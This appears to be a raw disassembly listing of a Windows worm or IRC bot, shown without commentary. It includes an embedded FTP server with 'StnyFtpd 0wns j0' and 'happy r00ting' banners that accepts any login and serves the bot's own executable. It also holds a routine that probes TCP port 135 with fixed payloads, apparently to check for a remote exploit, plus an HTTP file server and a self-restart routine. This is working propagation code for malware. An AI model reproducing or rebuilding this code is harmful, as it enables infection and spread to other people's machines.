push 200h
push eax
call sub_4163D7
add esp, 20h
loc_40571A: ; CODE XREF: sub_405673+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
lea eax, [ebp+var_500]
push eax
call sub_401014
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_405673 endp
; ---------------------------------------------------------------------------
db 34h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405779 proc near ; CODE XREF: sub_40134D�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40579A
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401073
add esp, 10h
jmp short loc_4057FB
; ---------------------------------------------------------------------------
loc_40579A: ; CODE XREF: sub_405779+9�j
push esi
push edi
push ebx
push ebx
call dword_4915CC ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_415CF8
pop ecx
mov edi, eax
push edi
push esi
call dword_4915CC ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_4057F2
loc_4057BE: ; CODE XREF: sub_405779+77�j
push offset aA_1 ; "A:\\"
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_4057E1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401073
add esp, 10h
loc_4057E1: ; CODE XREF: sub_405779+54�j
push esi
call sub_4158E0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_4057BE
loc_4057F2: ; CODE XREF: sub_405779+43�j
push edi
call sub_415D6C
pop ecx
pop edi
pop esi
loc_4057FB: ; CODE XREF: sub_405779+1F�j
pop ebx
pop ebp
retn
sub_405779 endp
; ---------------------------------------------------------------------------
db 21h dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43E92C
call dword_4916F4 ; closesocket
call sub_401109
call dword_4915BC ; WSACleanup
call dword_4915BC ; WSACleanup
mov ebx, ds:dword_495324
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_415CA0
push 44h
lea eax, [ebp-54h]
pop esi
push esi
push edi
push eax
call sub_415CA0
add esp, 18h
mov [ebp-54h], esi
mov esi, 104h
lea eax, [ebp-25Ch]
push esi
push eax
mov dword ptr [ebp-48h], offset byte_4370BC
mov dword ptr [ebp-28h], 1
mov [ebp-24h], di
call ds:dword_495364 ; GetSystemDirectoryA
lea eax, [ebp-158h]
push esi
push eax
push edi
call ds:dword_495330 ; GetModuleFileNameA
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
lea eax, [ebp-25Ch]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp-158h]
push edi
push eax
push edi
call ds:dword_495354 ; CreateProcessA
test eax, eax
jz short loc_4058E4
push 64h
call ebx ; Sleep
push dword ptr [ebp-10h]
mov esi, ds:dword_495358
call esi ; CloseHandle
push dword ptr [ebp-0Ch]
call esi ; CloseHandle
loc_4058E4: ; CODE XREF: .text:004058CE�j
mov eax, [ebp+10h]
mov dword ptr [eax+0B0h], offset dword_43DB84
mov eax, [esp]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_495350 ; ExitProcess
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 3Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405941 proc near ; CODE XREF: sub_401226�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40596F
loc_405952: ; CODE XREF: sub_405941+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_417210
add esp, 0Ch
test eax, eax
jz short loc_405975
inc esi
cmp esi, edi
jl short loc_405952
loc_40596F: ; CODE XREF: sub_405941+F�j
xor al, al
loc_405971: ; CODE XREF: sub_405941+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405975: ; CODE XREF: sub_405941+27�j
mov al, 1
jmp short loc_405971
sub_405941 endp
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; ---------------------------------------------------------------------------
loc_405987: ; CODE XREF: .text:0040131B�j
push ebp
mov ebp, esp
mov eax, 2010h
call sub_416880
mov eax, [ebp+0Ch]
push esi
dec eax
push edi
jz short loc_4059C8
dec eax
jz short loc_4059A6
dec eax
loc_4059A0: ; CODE XREF: .text:004059DE�j
xor eax, eax
loc_4059A2: ; CODE XREF: .text:004059C6�j
; .text:00405AF0�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4059A6: ; CODE XREF: .text:0040599D�j
push 3
push 1388h
push dword ptr [ebp+8]
call dword_49169C ; inet_addr
push eax
call sub_4012A8
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_4059A2
; ---------------------------------------------------------------------------
loc_4059C8: ; CODE XREF: .text:0040599A�j
push 6
push 1
push 2
call dword_4916DC ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+0Ch], esi
jz short loc_4059A0
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 87h
call dword_49165C ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_4011C2
pop ecx
mov [ebp-0Ch], eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_491604 ; connect
cmp eax, edi
jz loc_405AE4
push ebx
push 48h
push offset dword_42BC04
push esi
call dword_4916AC ; send
cmp eax, edi
jz loc_405AE4
mov esi, 2000h
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_491674 ; recv
cmp eax, edi
jz loc_405AE4
cmp byte ptr [ebp-200Eh], 0Ch
jnz short loc_405AE4
push ebx
push 18h
push offset dword_42BC50
push dword ptr [ebp+0Ch]
call dword_4916AC ; send
cmp eax, edi
jz short loc_405AE4
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_491674 ; recv
mov esi, eax
cmp esi, edi
jz short loc_405AE4
cmp byte ptr [ebp-200Eh], 2
jnz short loc_405AE4
push 10h
push offset dword_42BC6C
lea eax, [ebp-2010h]
push esi
push eax
call sub_401226
add esp, 10h
test al, al
jz short loc_405AC4
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_405AE4
; ---------------------------------------------------------------------------
loc_405AC4: ; CODE XREF: .text:00405AB6�j
push 10h
push offset dword_42BC80
lea eax, [ebp-2010h]
push esi
push eax
call sub_401226
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_405AE4: ; CODE XREF: .text:00405A22�j
; .text:00405A39�j ...
push dword ptr [ebp+0Ch]
call dword_4916F4 ; closesocket
mov eax, ebx
pop ebx
jmp loc_4059A2
; ---------------------------------------------------------------------------
db 5Bh dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp-6DCh]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp-0A6Ch]
xor edi, edi
push eax
push 101h
mov [ebp-28h], ebx
mov [ebp-18h], ebx
mov [ebp-228h], edi
mov [ebp-438h], edi
call ds:dword_495518 ; WSAStartup
push edi
call sub_4174F2
push eax
call sub_416B0E
push 0FA00h
push 539h
call sub_40133E
add esp, 10h
mov dword_43DB94, eax
push edi
push ebx
push 2
call ds:dword_49553C ; socket
mov esi, eax
lea eax, [ebp-28h]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp-0Ch], esi
call ds:dword_49551C ; setsockopt
lea eax, [ebp-18h]
push eax
push 8004667Eh
push esi
call ds:dword_495520 ; ioctlsocket
mov ax, word ptr dword_43DB94
mov word ptr [ebp-38h], 2
push eax
mov [ebp-34h], edi
call ds:dword_495524 ; htons
mov [ebp-36h], ax
lea eax, [ebp-38h]
push 10h
push eax
push esi
call ds:dword_495528 ; bind
test eax, eax
jge short loc_405C25
mov eax, ebx
jmp loc_40614C
; ---------------------------------------------------------------------------
loc_405C25: ; CODE XREF: .text:00405C1C�j
push 0Ah
push esi
call ds:dword_49552C ; listen
mov [ebp-228h], ebx
mov ebx, ds:dword_495540
mov [ebp-224h], esi
mov [ebp-4], esi
loc_405C43: ; CODE XREF: .text:00405C7C�j
; .text:00406144�j
push 41h
lea esi, [ebp-228h]
pop ecx
lea edi, [ebp-438h]
rep movsd
xor esi, esi
lea eax, [ebp-438h]
push esi
push esi
push esi
push eax
mov eax, [ebp-4]
inc eax
push eax
call ds:dword_495544 ; select
cmp eax, 0FFFFFFFFh
jz loc_406149
xor edi, edi
cmp [ebp-4], esi
mov [ebp+8], edi
jl short loc_405C43
loc_405C7E: ; CODE XREF: .text:0040613E�j
xor esi, esi
push 64h
lea eax, [ebp-29Ch]
push esi
push eax
call sub_415CA0
push 64h
lea eax, [ebp-0ACh]
push esi
push eax
call sub_415CA0
add esp, 18h
lea eax, [ebp-438h]
push eax
push edi
call sub_421070 ; __WSAFDIsSet
test eax, eax
jz loc_406137
cmp edi, [ebp-0Ch]
jnz short loc_405D35
lea eax, [ebp-24h]
mov dword ptr [ebp-24h], 10h
push eax
lea eax, [ebp-238h]
push eax
push dword ptr [ebp-0Ch]
call ds:dword_495530 ; accept
cmp eax, 0FFFFFFFFh
jz loc_406137
xor ecx, ecx
cmp [ebp-228h], esi
jbe short loc_405CFF
lea edx, [ebp-224h]
loc_405CEF: ; CODE XREF: .text:00405CFD�j
cmp [edx], eax
jz short loc_405CFF
inc ecx
add edx, 4
cmp ecx, [ebp-228h]
jb short loc_405CEF
loc_405CFF: ; CODE XREF: .text:00405CE7�j
; .text:00405CF1�j
cmp ecx, [ebp-228h]
jnz short loc_405D1D
cmp dword ptr [ebp-228h], 40h
jnb short loc_405D1D
mov [ebp+ecx*4-224h], eax
inc dword ptr [ebp-228h]
loc_405D1D: ; CODE XREF: .text:00405D05�j
; .text:00405D0E�j
cmp eax, [ebp-4]
jle short loc_405D25
mov [ebp-4], eax
loc_405D25: ; CODE XREF: .text:00405D20�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_406137
; ---------------------------------------------------------------------------
loc_405D35: ; CODE XREF: .text:00405CB9�j
push esi
lea eax, [ebp-29Ch]
push 64h
push eax
push edi
call ds:dword_495534 ; recv
test eax, eax
jg short loc_405D9C
mov edx, [ebp-228h]
xor ecx, ecx
cmp edx, esi
jbe short loc_405D90
lea eax, [ebp-224h]
loc_405D5C: ; CODE XREF: .text:00405D66�j
cmp [eax], edi
jz short loc_405D6A
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_405D5C
jmp short loc_405D90
; ---------------------------------------------------------------------------
loc_405D6A: ; CODE XREF: .text:00405D5E�j
dec edx
cmp ecx, edx
jnb short loc_405D8A
lea eax, [ebp+ecx*4-224h]
loc_405D76: ; CODE XREF: .text:00405D88�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp-228h]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_405D76
loc_405D8A: ; CODE XREF: .text:00405D6D�j
dec dword ptr [ebp-228h]
loc_405D90: ; CODE XREF: .text:00405D54�j
; .text:00405D68�j
push edi
call ds:dword_495538 ; closesocket
jmp loc_406137
; ---------------------------------------------------------------------------
loc_405D9C: ; CODE XREF: .text:00405D48�j
lea eax, [ebp-334h]
push eax
lea eax, [ebp-0ACh]
push eax
lea eax, [ebp-29Ch]
push offset aSS ; "%s %s"
push eax
call sub_416B36
lea eax, [ebp-0ACh]
push offset aUser ; "USER"
push eax
call sub_416B70
add esp, 18h
test eax, eax
jnz short loc_405DE0
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405DE0: ; CODE XREF: .text:00405DD1�j
lea eax, [ebp-0ACh]
push offset aPass ; "PASS"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405E04
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405E04: ; CODE XREF: .text:00405DF5�j
lea eax, [ebp-0ACh]
push offset aSyst ; "SYST"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405E28
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405E28: ; CODE XREF: .text:00405E19�j
lea eax, [ebp-0ACh]
push offset aRest ; "REST"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405E4C
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405E4C: ; CODE XREF: .text:00405E3D�j
lea eax, [ebp-0ACh]
push offset off_42BED0
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405E70
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405E70: ; CODE XREF: .text:00405E61�j
lea eax, [ebp-0ACh]
push offset aType ; "TYPE"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405EAB
lea eax, [ebp-334h]
push offset aA ; "A"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405EAB
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405EAB: ; CODE XREF: .text:00405E85�j
; .text:00405E9C�j
lea eax, [ebp-0ACh]
push offset aType ; "TYPE"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405EE6
lea eax, [ebp-334h]
push offset aI ; "I"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405EE6
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_406122
; ---------------------------------------------------------------------------
loc_405EE6: ; CODE XREF: .text:00405EC0�j
; .text:00405ED7�j
lea eax, [ebp-0ACh]
push offset aPasv ; "PASV"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405F34
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp-124h]
rep movsd
push eax
lea eax, [ebp-124h]
push eax
movsw
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-124h]
loc_405F24: ; CODE XREF: .text:00405F73�j
push eax
push dword ptr [ebp+8]
call ebx ; send
xor esi, esi
loc_405F2C: ; CODE XREF: .text:00406043�j
mov edi, [ebp+8]
jmp loc_406125
; ---------------------------------------------------------------------------
loc_405F34: ; CODE XREF: .text:00405EFB�j
lea eax, [ebp-0ACh]
push offset aList ; "LIST"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_405F75
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp-0C4h]
rep movsd
movsw
push eax
lea eax, [ebp-0C4h]
push eax
movsb
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-0C4h]
jmp short loc_405F24
; ---------------------------------------------------------------------------
loc_405F75: ; CODE XREF: .text:00405F49�j
lea eax, [ebp-0ACh]
push offset aPort ; "PORT"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_406048
lea eax, [ebp-2D0h]
push eax
lea eax, [ebp-0F8h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-29Ch]
push offset aS_0 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_416B36
lea eax, [ebp-0F8h]
push eax
call sub_416CCF
mov edi, eax
lea eax, [ebp-2D0h]
push eax
call sub_416CCF
mov [ebp-8], eax
push 32h
lea eax, [ebp-0F8h]
push esi
push eax
call sub_415CA0
push dword ptr [ebp-8]
lea eax, [ebp-0F8h]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_416821
add esp, 44h
lea eax, [ebp-0F8h]
push 10h
push esi
push eax
call sub_4174DB
mov [ebp-8], eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-48h]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_416821
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push dword ptr [ebp+8]
call ebx ; send
jmp loc_405F2C
; ---------------------------------------------------------------------------
loc_406048: ; CODE XREF: .text:00405F8A�j
lea eax, [ebp-0ACh]
push offset aRetr ; "RETR"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz loc_406103
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push dword ptr [ebp-8]
lea eax, [ebp-48h]
push eax
call sub_401267
pop ecx
cmp eax, 1
pop ecx
jnz short loc_4060F9
call sub_4012DF
cmp eax, 1
jnz loc_406125
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp-6D8h]
push eax
lea eax, [ebp-48h]
push dword_43DB94
push eax
lea eax, [ebp-8DCh]
push offset dword_42BD04
push eax
call sub_416821
add esp, 14h
cmp [ebp-440h], esi
jnz short loc_4060EA
push esi
lea eax, [ebp-8DCh]
push dword ptr [ebp-444h]
push eax
lea eax, [ebp-4C4h]
push eax
push dword ptr [ebp-6DCh]
call sub_4010D2
add esp, 14h
loc_4060EA: ; CODE XREF: .text:004060C5�j
lea eax, [ebp-8DCh]
push eax
call sub_401014
pop ecx
jmp short loc_406125
; ---------------------------------------------------------------------------
loc_4060F9: ; CODE XREF: .text:0040607F�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_406122
; ---------------------------------------------------------------------------
loc_406103: ; CODE XREF: .text:0040605D�j
lea eax, [ebp-0ACh]
push offset aQuit ; "QUIT"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_406125
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_406122: ; CODE XREF: .text:00405DDB�j
; .text:00405DFF�j ...
push edi
call ebx ; send
loc_406125: ; CODE XREF: .text:00405F2F�j
; .text:00406089�j ...
push 64h
lea eax, [ebp-29Ch]
push esi
push eax
call sub_415CA0
add esp, 0Ch
loc_406137: ; CODE XREF: .text:00405CB0�j
; .text:00405CD9�j ...
inc edi
cmp edi, [ebp-4]
mov [ebp+8], edi
jle loc_405C7E
jmp loc_405C43
; ---------------------------------------------------------------------------
loc_406149: ; CODE XREF: .text:00405C6E�j
push 1
pop eax
loc_40614C: ; CODE XREF: .text:00405C20�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
db 180h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062D3 proc near ; CODE XREF: sub_401267�j
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_495518 ; WSAStartup
push 0
push 1
push 2
call ds:dword_49553C ; socket
push [ebp+arg_0]
mov dword_43DB90, eax
mov [ebp+var_10], 2
call ds:dword_49550C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_495524 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_43DB90
call ds:dword_495510 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40634B
push dword_43DB90
call ds:dword_495538 ; closesocket
call ds:dword_495514 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40634B: ; CODE XREF: sub_4062D3+60�j
push 1
pop eax
leave
retn
sub_4062D3 endp
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636F proc near ; CODE XREF: sub_4012DF�j
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:dword_495330 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_42B830
push eax
call sub_417012
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_406406
test byte ptr [esi+0Ch], 10h
jnz short loc_4063EA
push edi
mov edi, 400h
loc_4063B2: ; CODE XREF: sub_40636F+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_416DEA
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push dword_43DB90
call ds:dword_495540 ; send
push 1
call ds:dword_495324 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_4063B2
pop edi
loc_4063EA: ; CODE XREF: sub_40636F+3B�j
push esi
call sub_416D94
pop ecx
push dword_43DB90
call ds:dword_495538 ; closesocket
call ds:dword_495514 ; WSACleanup
push 1
pop eax
loc_406406: ; CODE XREF: sub_40636F+35�j
pop esi
leave
retn
sub_40636F endp
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40642F: ; CODE XREF: sub_4012F8�j
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_416880
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp-5ECh]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp-24h]
push ebx
push eax
mov [ebp-14h], esi
call sub_415CA0
add esp, 0Ch
mov word ptr [ebp-24h], 2
push dword ptr [ebp-25Ch]
call dword_49165C ; htons
push ebx
push esi
push 2
mov [ebp-22h], ax
mov [ebp-20h], ebx
call dword_4916DC ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp-0Ch], edi
jz loc_40681A
mov eax, [ebp-254h]
push 10h
imul eax, 234h
mov dword_43E92C[eax], edi
lea eax, [ebp-24h]
push eax
push edi
call dword_491688 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40681A
push 7FFFFFFFh
push edi
call dword_491684 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40681A
lea eax, [ebp-14h]
push eax
push 8004667Eh
push edi
call dword_4916F8 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40681A
mov ebx, esi
mov [ebp-134h], edi
mov [ebp-138h], ebx
mov [ebp-8], edi
loc_406506: ; CODE XREF: .text:00406810�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp-138h]
push eax
push eax
push eax
lea eax, [ebp-6F0h]
push eax
mov eax, [ebp-8]
lea edi, [ebp-6F0h]
inc eax
rep movsd
push eax
call dword_491644 ; select
cmp eax, 0FFFFFFFFh
jz loc_406815
xor esi, esi
mov [ebp-4], esi
loc_40653C: ; CODE XREF: .text:0040680A�j
lea eax, [ebp-6F0h]
push eax
push esi
call dword_491554 ; __WSAFDIsSet
test eax, eax
jz loc_406800
cmp esi, [ebp-0Ch]
jnz short loc_4065BE
lea eax, [ebp-10h]
mov dword ptr [ebp-10h], 10h
push eax
lea eax, [ebp-34h]
push eax
push dword ptr [ebp-0Ch]
call dword_4916F0 ; accept
cmp eax, 0FFFFFFFFh
jz loc_406800
xor ecx, ecx
test ebx, ebx
jbe short loc_406590
lea edx, [ebp-134h]
loc_406584: ; CODE XREF: .text:0040658E�j
cmp [edx], eax
jz short loc_406590
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_406584
loc_406590: ; CODE XREF: .text:0040657C�j
; .text:00406586�j
cmp ecx, ebx
jnz short loc_4065AD
cmp ebx, 40h
jnb short loc_4065AD
mov [ebp+ecx*4-134h], eax
mov ebx, [ebp-138h]
inc ebx
mov [ebp-138h], ebx
loc_4065AD: ; CODE XREF: .text:00406592�j
; .text:00406597�j
cmp eax, [ebp-8]
jbe loc_406800
mov [ebp-8], eax
jmp loc_406800
; ---------------------------------------------------------------------------
loc_4065BE: ; CODE XREF: .text:00406555�j
mov edi, 1000h
lea eax, [ebp-28F0h]
push edi
push 0
push eax
call sub_415CA0
push edi
lea eax, [ebp-18F0h]
push 0
push eax
call sub_415CA0
add esp, 18h
lea eax, [ebp-28F0h]
push 0
push edi
push eax
push esi
call dword_491674 ; recv
test eax, eax
jg short loc_406651
push esi
call dword_4916F4 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_406800
lea eax, [ebp-134h]
loc_406610: ; CODE XREF: .text:0040661A�j
cmp [eax], esi
jz short loc_406621
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_406610
jmp loc_406800
; ---------------------------------------------------------------------------
loc_406621: ; CODE XREF: .text:00406612�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_406645
lea eax, [ebp+ecx*4-134h]
loc_40662F: ; CODE XREF: .text:00406643�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp-138h]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40662F
loc_406645: ; CODE XREF: .text:00406626�j
dec ebx
mov [ebp-138h], ebx
jmp loc_406800
; ---------------------------------------------------------------------------
loc_406651: ; CODE XREF: .text:004065F7�j
xor esi, esi
push 104h
lea eax, [ebp-23Ch]
push esi
push eax
call sub_415CA0
lea eax, [ebp-28F0h]
mov [ebp+8], esi
push eax
call sub_4158E0
add esp, 10h
test eax, eax
jbe loc_406800
loc_40667F: ; CODE XREF: .text:00406738�j
mov eax, [ebp+8]
mov al, [ebp+eax-28F0h]
cmp al, 0Ah
mov [ebp+esi-18F0h], al
jnz loc_406724
mov esi, offset aGet ; "GET "
lea eax, [ebp-18F0h]
push esi
push eax
call sub_417760
pop ecx
test eax, eax
pop ecx
jz short loc_4066F8
lea eax, [ebp-18F0h]
push eax
call sub_4158E0
cmp eax, 5
pop ecx
jbe short loc_4066F8
mov eax, offset asc_42BFC4 ; " "
push eax
push eax
lea eax, [ebp-18F0h]
push esi
push eax
call sub_417760
pop ecx
pop ecx
push eax
call sub_417760
pop ecx
pop ecx
push eax
call sub_4176C0
push eax
lea eax, [ebp-23Ch]
push eax
call sub_4175D0
add esp, 10h
jmp short loc_40670F
; ---------------------------------------------------------------------------
loc_4066F8: ; CODE XREF: .text:004066AE�j
; .text:004066C0�j
lea eax, [ebp-18F0h]
push offset asc_42BFC0 ; "\r\n"
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_406743
loc_40670F: ; CODE XREF: .text:004066F6�j
push edi
lea eax, [ebp-18F0h]
push 0
push eax
call sub_415CA0
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_406724: ; CODE XREF: .text:00406692�j
inc dword ptr [ebp+8]
lea eax, [ebp-28F0h]
push eax
inc esi
call sub_4158E0
cmp [ebp+8], eax
pop ecx
jb loc_40667F
jmp loc_406800
; ---------------------------------------------------------------------------
loc_406743: ; CODE XREF: .text:0040670D�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40678D
lea eax, [ebp-134h]
loc_40674F: ; CODE XREF: .text:0040675C�j
mov esi, [ebp-4]
cmp [eax], esi
jz short loc_406760
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40674F
jmp short loc_406790
; ---------------------------------------------------------------------------
loc_406760: ; CODE XREF: .text:00406754�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_406784
lea eax, [ebp+ecx*4-134h]
loc_40676E: ; CODE XREF: .text:00406782�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp-138h]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40676E
loc_406784: ; CODE XREF: .text:00406765�j
dec ebx
mov [ebp-138h], ebx
jmp short loc_406790
; ---------------------------------------------------------------------------
loc_40678D: ; CODE XREF: .text:00406747�j
mov esi, [ebp-4]
loc_406790: ; CODE XREF: .text:0040675E�j
; .text:0040678B�j
lea eax, [ebp-23Ch]
test eax, eax
jz short loc_4067F9
lea eax, [ebp-360h]
push eax
call sub_4158E0
mov edi, eax
lea eax, [ebp-23Ch]
push eax
call sub_4158E0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_4067F9
and dword ptr [ebp+8], 0
lea eax, [ebp+8]
push eax
push 8004667Eh
push esi
call dword_4916F8 ; ioctlsocket
push dword ptr [ebp-254h]
lea eax, [ebp-23Ch]
push dword ptr [ebp-248h]
push eax
lea eax, [ebp-360h]
push eax
push esi
call sub_401325
add esp, 14h
jmp short loc_406800
; ---------------------------------------------------------------------------
loc_4067F9: ; CODE XREF: .text:00406798�j
; .text:004067BE�j
push esi
call dword_4916F4 ; closesocket
